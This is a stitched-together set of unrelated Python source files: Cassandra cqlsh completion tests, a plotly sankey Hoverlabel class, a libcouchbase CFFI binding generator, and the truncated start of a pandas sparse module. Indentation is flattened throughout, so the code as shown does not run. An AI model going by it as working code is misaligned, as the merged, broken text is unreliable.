def test_complete_in_batch(self):
pass
def test_complete_in_create_keyspace(self):
self.trycompletions('create keyspace ', '', choices=('<identifier>', '<quotedName>', 'IF'))
self.trycompletions('create keyspace moo ',
"WITH replication = {'class': '")
self.trycompletions('create keyspace "12SomeName" with ',
"replication = {'class': '")
self.trycompletions("create keyspace fjdkljf with foo=bar ", "",
choices=('AND', ';'))
self.trycompletions("create keyspace fjdkljf with foo=bar AND ",
"replication = {'class': '")
self.trycompletions("create keyspace moo with replication", " = {'class': '")
self.trycompletions("create keyspace moo with replication=", " {'class': '")
self.trycompletions("create keyspace moo with replication={", "'class':'")
self.trycompletions("create keyspace moo with replication={'class'", ":'")
self.trycompletions("create keyspace moo with replication={'class': ", "'")
self.trycompletions("create keyspace moo with replication={'class': '", "",
choices=self.strategies())
# ttl is an "unreserved keyword". should work
self.trycompletions("create keySPACE ttl with replication ="
"{ 'class' : 'SimpleStrategy'", ", 'replication_factor': ")
self.trycompletions("create keyspace ttl with replication ="
"{'class':'SimpleStrategy',", " 'replication_factor': ")
self.trycompletions("create keyspace \"ttl\" with replication ="
"{'class': 'SimpleStrategy', ", "'replication_factor': ")
self.trycompletions("create keyspace \"ttl\" with replication ="
"{'class': 'SimpleStrategy', 'repl", "ication_factor'")
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': ", '',
choices=('<term>',))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1", '',
choices=('<term>',))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1 ", '}')
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1, ",
'', choices=())
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1} ",
'', choices=('AND', ';'))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'NetworkTopologyStrategy', ", '',
choices=('<dc_name>',))
self.trycompletions("create keyspace \"PB and J\" with replication={"
"'class': 'NetworkTopologyStrategy'", ', ')
self.trycompletions("create keyspace PBJ with replication={"
"'class': 'NetworkTopologyStrategy'} and ",
"durable_writes = '")
def test_complete_in_string_literals(self):
# would be great if we could get a space after this sort of completion,
# but readline really wants to make things difficult for us
self.trycompletions("create keyspace blah with replication = {'class': 'Sim",
"pleStrategy'")
def test_complete_in_drop(self):
self.trycompletions('DR', immediate='OP ')
self.trycompletions('DROP ',
choices=['AGGREGATE', 'COLUMNFAMILY', 'FUNCTION',
'INDEX', 'KEYSPACE', 'ROLE', 'TABLE',
'TRIGGER', 'TYPE', 'USER', 'MATERIALIZED'])
def test_complete_in_drop_keyspace(self):
self.trycompletions('DROP K', immediate='EYSPACE ')
quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions('DROP KEYSPACE ',
choices=['IF', quoted_keyspace])
self.trycompletions('DROP KEYSPACE ' + quoted_keyspace,
choices=[';'])
self.trycompletions('DROP KEYSPACE I',
immediate='F EXISTS ' + quoted_keyspace + ';')
def create_columnfamily_table_template(self, name):
"""Parameterized test for CREATE COLUMNFAMILY and CREATE TABLE. Since
they're synonyms, they should have the same completion behavior, so this
test avoids duplication between tests for the two statements."""
prefix = 'CREATE ' + name + ' '
quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions(prefix + '',
choices=['IF', quoted_keyspace, '<new_table_name>'])
self.trycompletions(prefix + 'IF ',
immediate='NOT EXISTS ')
self.trycompletions(prefix + 'IF NOT EXISTS ',
choices=['<new_table_name>', quoted_keyspace])
self.trycompletions(prefix + 'IF NOT EXISTS new_table ',
immediate='( ')
self.trycompletions(prefix + quoted_keyspace, choices=['.', '('])
self.trycompletions(prefix + quoted_keyspace + '( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + quoted_keyspace + '.',
choices=['<new_table_name>'])
self.trycompletions(prefix + quoted_keyspace + '.new_table ',
immediate='( ')
self.trycompletions(prefix + quoted_keyspace + '.new_table ( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + ' new_table ( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + ' new_table (col_a ine',
immediate='t ')
self.trycompletions(prefix + ' new_table (col_a int ',
choices=[',', 'PRIMARY'])
self.trycompletions(prefix + ' new_table (col_a int P',
immediate='RIMARY KEY ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY ',
choices=[')', ','])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY,',
choices=['<identifier>', '<quotedName>'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY)',
immediate=' ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) ',
choices=[';', 'WITH'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) W',
immediate='ITH ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH ',
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH ',
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH bloom_filter_fp_chance ',
immediate='= ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH bloom_filter_fp_chance = ',
choices=['<float_between_0_and_1>'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH compaction ',
immediate="= {'class': '")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': '",
choices=['SizeTieredCompactionStrategy',
'LeveledCompactionStrategy',
'DateTieredCompactionStrategy',
'TimeWindowCompactionStrategy'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'S",
immediate="izeTieredCompactionStrategy'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy",
immediate="'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'",
choices=['}', ','])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy', ",
immediate="'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy', '",
choices=['bucket_high', 'bucket_low', 'class',
'enabled', 'max_threshold',
'min_sstable_size', 'min_threshold',
'tombstone_compaction_interval',
'tombstone_threshold',
'unchecked_tombstone_compaction',
'only_purge_repaired_tombstones'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'}",
choices=[';', 'AND'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'} AND ",
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'DateTieredCompactionStrategy', '",
choices=['base_time_seconds', 'max_sstable_age_days',
'timestamp_resolution', 'min_threshold', 'class', 'max_threshold',
'tombstone_compaction_interval', 'tombstone_threshold',
'enabled', 'unchecked_tombstone_compaction',
'max_window_size_seconds', 'only_purge_repaired_tombstones'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'TimeWindowCompactionStrategy', '",
choices=['compaction_window_unit', 'compaction_window_size',
'timestamp_resolution', 'min_threshold', 'class', 'max_threshold',
'tombstone_compaction_interval', 'tombstone_threshold',
'enabled', 'unchecked_tombstone_compaction',
'only_purge_repaired_tombstones'])
def test_complete_in_create_columnfamily(self):
self.trycompletions('CREATE C', choices=['COLUMNFAMILY', 'CUSTOM'])
self.trycompletions('CREATE CO', immediate='LUMNFAMILY ')
self.create_columnfamily_table_template('COLUMNFAMILY')
def test_complete_in_create_table(self):
self.trycompletions('CREATE T', choices=['TRIGGER', 'TABLE', 'TYPE'])
self.trycompletions('CREATE TA', immediate='BLE ')
self.create_columnfamily_table_template('TABLE')
def test_complete_in_describe(self):
"""
Tests for Cassandra-10733
"""
self.trycompletions('DES', immediate='C')
# quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions('DESCR', immediate='IBE ')
self.trycompletions('DESC TABLE ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'system_distributed.',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DESC TYPE ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'address',
'phone_number',
'band_info_type',
'tags'],
other_choices_ok=True)
self.trycompletions('DESC FUNCTION ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'fbestband',
'fbestsong',
'fmax',
'fmin',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DESC AGGREGATE ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'aggmin',
'aggmax',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
# Unfortunately these commented tests will not work. This is due to the keyspace name containing quotes;
# cqlsh auto-completes a DESC differently when the keyspace contains quotes. I'll leave the
# test here though in case we ever change this script to test using keyspace names without
# quotes
# self.trycompletions('DESC TABLE ' + '"' + self.cqlsh.keyspace + '"', immediate='.')
self.trycompletions('DESC TABLE ' + '"' + self.cqlsh.keyspace + '".',
choices=['twenty_rows_table',
'ascii_with_special_chars',
'users',
'has_all_types',
'empty_composite_table',
'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'songs'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC TYPE ' + '"' + self.cqlsh.keyspace + '"', immediate='.')
self.trycompletions('DESC TYPE ' + '"' + self.cqlsh.keyspace + '".',
choices=['address',
'phone_number',
'band_info_type',
'tags'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '"', immediate='.f')
self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '".', immediate='f')
self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '".f',
choices=['fbestband',
'fbestsong',
'fmax',
'fmin'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '"', immediate='.aggm')
self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '".', immediate='aggm')
self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '".aggm',
choices=['aggmin',
'aggmax'],
other_choices_ok=True)
def test_complete_in_drop_columnfamily(self):
pass
def test_complete_in_truncate(self):
pass
def test_complete_in_alter_columnfamily(self):
pass
def test_complete_in_use(self):
pass
def test_complete_in_create_index(self):
pass
def test_complete_in_drop_index(self):
pass
|
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "sankey"
_path_str = "sankey.hoverlabel"
_valid_props = {
"align",
"alignsrc",
"bgcolor",
"bgcolorsrc",
"bordercolor",
"bordercolorsrc",
"font",
"namelength",
"namelengthsrc",
}
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `align`.
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `bgcolor`.
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.sankey.hoverlabel.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system on which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans", "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
Returns
-------
plotly.graph_objs.sankey.hoverlabel.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`namelength`.
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans two or more lines
alignsrc
Sets the source reference on Chart Studio Cloud for
`align`.
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud for
`bgcolor`.
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud for
`namelength`.
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.sankey.Hoverlabel`
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans two or more lines
alignsrc
Sets the source reference on Chart Studio Cloud for
`align`.
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud for
`bgcolor`.
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud for
`namelength`.
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__("hoverlabel")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.sankey.Hoverlabel
constructor must be a dict or
an instance of :class:`plotly.graph_objs.sankey.Hoverlabel`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
_v = align if align is not None else _v
if _v is not None:
self["align"] = _v
_v = arg.pop("alignsrc", None)
_v = alignsrc if alignsrc is not None else _v
if _v is not None:
self["alignsrc"] = _v
_v = arg.pop("bgcolor", None)
_v = bgcolor if bgcolor is not None else _v
if _v is not None:
self["bgcolor"] = _v
_v = arg.pop("bgcolorsrc", None)
_v = bgcolorsrc if bgcolorsrc is not None else _v
if _v is not None:
self["bgcolorsrc"] = _v
_v = arg.pop("bordercolor", None)
_v = bordercolor if bordercolor is not None else _v
if _v is not None:
self["bordercolor"] = _v
_v = arg.pop("bordercolorsrc", None)
_v = bordercolorsrc if bordercolorsrc is not None else _v
if _v is not None:
self["bordercolorsrc"] = _v
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("namelength", None)
_v = namelength if namelength is not None else _v
if _v is not None:
self["namelength"] = _v
_v = arg.pop("namelengthsrc", None)
_v = namelengthsrc if namelengthsrc is not None else _v
if _v is not None:
self["namelengthsrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
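# Illustrative sketch (not part of the generated module): constructing a
# sankey Hoverlabel and attaching it to a trace. The import is deferred so
# this helper has no effect at module import time; the property values and
# the tiny node/link definition are examples only.
def _example_sankey_hoverlabel():
    import plotly.graph_objects as go

    hoverlabel = Hoverlabel(bgcolor="white", namelength=-1, align="left")
    return go.Sankey(
        hoverlabel=hoverlabel,
        node=dict(label=["A", "B"]),
        link=dict(source=[0], target=[1], value=[1]),
    )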
|
|
from __future__ import print_function
import os
import subprocess
import re
from cffi import FFI
# Globals
CPP_OUTPUT = os.path.join(os.path.dirname(__file__), "_lcb.h")
FAKE_INKPATH = os.path.join(os.path.dirname(__file__), 'fakeinc')
LCB_ROOT = os.environ.get('PYCBC_CFFI_PREFIX', '')
ffi = FFI()
C = None
CPP_INPUT = """
#define __attribute__(x)
#include <libcouchbase/couchbase.h>
#include <libcouchbase/api3.h>
#include <libcouchbase/views.h>
#include <libcouchbase/n1ql.h>
void _Cb_set_key(void*,const void*, size_t);
void _Cb_set_val(void*,const void*, size_t);
void _Cb_do_callback(lcb_socket_t s, short events, lcb_ioE_callback cb, void *arg);
void memset(void*,int,int);
"""
VERIFY_INPUT = """
#include <assert.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <libcouchbase/couchbase.h>
#include <libcouchbase/api3.h>
#include <libcouchbase/views.h>
#include <libcouchbase/n1ql.h>
void _Cb_set_key(void *cmd, const void *key, size_t nkey) {
LCB_CMD_SET_KEY((lcb_CMDBASE*)cmd, key, nkey);
}
void _Cb_set_val(void *cmd, const void *val, size_t nval) {
LCB_CMD_SET_VALUE((lcb_CMDSTORE*)cmd, val, nval);
}
void _Cb_do_callback(lcb_socket_t s, short events, lcb_ioE_callback cb, void *arg) {
cb(s, events, arg);
}
LIBCOUCHBASE_API
lcb_error_t
lcb_n1p_synctok_for(lcb_N1QLPARAMS *params, lcb_t instance,
const void *key, size_t nkey) { return LCB_SUCCESS; }
"""
RX_SHIFT = re.compile(r'(\(?\d+\)?)\s*((?:<<)|(?:>>)|(?:\|))\s*(\(?\d+\)?)')
def shift_replace(m):
ss = '{0} {1} {2}'.format(m.group(1), m.group(2), m.group(3))
return str(eval(ss))
def do_replace_vals(dh, decl):
keys = sorted(dh, key=len, reverse=True)
for k in keys:
decl = decl.replace(k, str(dh[k]))
return decl
def handle_enumvals(defhash, linedecl):
# First, inspect to see if there is any funky magic going on here,
# this can include things like shifts and the like
linedecl = linedecl.strip()
cur_decls = []
for decl in linedecl.split(','):
if not decl:
continue
if not '=' in decl:
cur_decls.append(decl)
continue
if '{' in decl:
preamble, decl = decl.split('{')
preamble += "{"
else:
preamble = ""
if '}' in decl:
decl, postamble = decl.split('}')
postamble = "}" + postamble
else:
postamble = ""
print(decl)
name, val = decl.split('=', 1)
name = name.strip()
val = val.strip()
val = val.replace(',', '')
val = do_replace_vals(defhash, val)
if not name.lower().startswith('lcb'):
continue
print("Handling", decl)
while RX_SHIFT.search(val):
val = RX_SHIFT.sub(shift_replace, val)
try:
ival = int(val)
except ValueError:
ival = int(val, 16)
decl = '{0}={1}'.format(name, str(ival))
defhash[name] = ival
cur_decls.append(preamble + decl + postamble)
ret = ','.join(cur_decls)
if '}' not in ret:
ret += ','
return ret
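# Illustrative sketch (not part of the generator): how a shift expression in
# an enum value is folded into a plain integer by RX_SHIFT/shift_replace
# before being recorded in the definition hash. The input value is
# hypothetical.
def _example_fold_shift_expression(val='(1 << 4)'):
    while RX_SHIFT.search(val):
        val = RX_SHIFT.sub(shift_replace, val)
    return int(val)  # '(1 << 4)' folds to 16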
CPP_COMMON = ['gcc', '-E', '-Wall', '-Wextra',
'-I{0}'.format(FAKE_INKPATH), '-I{0}/include'.format(LCB_ROOT),
'-std=c89', '-xc']
def get_preprocessed(csrc, extra_options=None):
options = CPP_COMMON[::]
if extra_options:
options += extra_options
options += ['-']
po = subprocess.Popen(options, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if not isinstance(csrc, bytes):
    csrc = csrc.encode('utf-8')
stdout, _ = po.communicate(csrc)
if po.returncode != 0:
raise ValueError("Bad CPP Input!")
try:
return str(stdout, 'utf8').split("\n")
except TypeError:
return stdout.split("\n")
def _exec_cpp():
lines = get_preprocessed(CPP_INPUT)
outlines = []
defhash = {}
for l in lines:
if l.startswith('#'):
continue
if not l:
continue
# Find definitions
if '=' in l and '==' not in l:
# Handle enums
l = handle_enumvals(defhash, l)
l = l.replace("\r", "")
outlines.append(l)
with open(CPP_OUTPUT, "w") as fp:
fp.write("\n".join(outlines))
fp.flush()
def ensure_header():
if os.environ.get('PYCBC_CFFI_REGENERATE'):
do_generate = True
elif not os.path.exists(CPP_OUTPUT):
do_generate = True
else:
do_generate = False
if do_generate:
_exec_cpp()
def get_handle():
global C
if C:
return ffi, C
ensure_header()
ffi.cdef(open(CPP_OUTPUT, "r").read())
ffi.cdef(r'''
#define LCB_CMDOBSERVE_F_MASTER_ONLY ...
#define LCB_RESP_F_FINAL ...
#define LCB_CNTL_SET ...
#define LCB_CNTL_GET ...
#define LCB_CNTL_BUCKETNAME ...
#define LCB_CNTL_VBMAP ...
#define LCB_CMDVIEWQUERY_F_INCLUDE_DOCS ...
#define LCB_N1P_QUERY_STATEMENT ...
''')
C = ffi.verify(VERIFY_INPUT,
libraries=['couchbase'],
library_dirs=[os.path.join(LCB_ROOT, 'lib')],
include_dirs=[os.path.join(LCB_ROOT, 'include')],
runtime_library_dirs=[os.path.join(LCB_ROOT, 'lib')])
return ffi, C
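# Illustrative sketch (not part of the binding generator): obtaining the FFI
# handle and checking a constant from the generated cdef. This assumes a
# libcouchbase installation is available under LCB_ROOT and that LCB_SUCCESS
# (value 0 in libcouchbase's lcb_error_t enum) was picked up from the header.
def _example_check_bindings():
    ffi_handle, lib = get_handle()
    return lib.LCB_SUCCESS == 0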
|
|
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
# pylint: disable=E1101,E1103,W0231
import numpy as np
import warnings
from pandas.core.dtypes.missing import isna, notna
from pandas.compat.numpy import function as nv
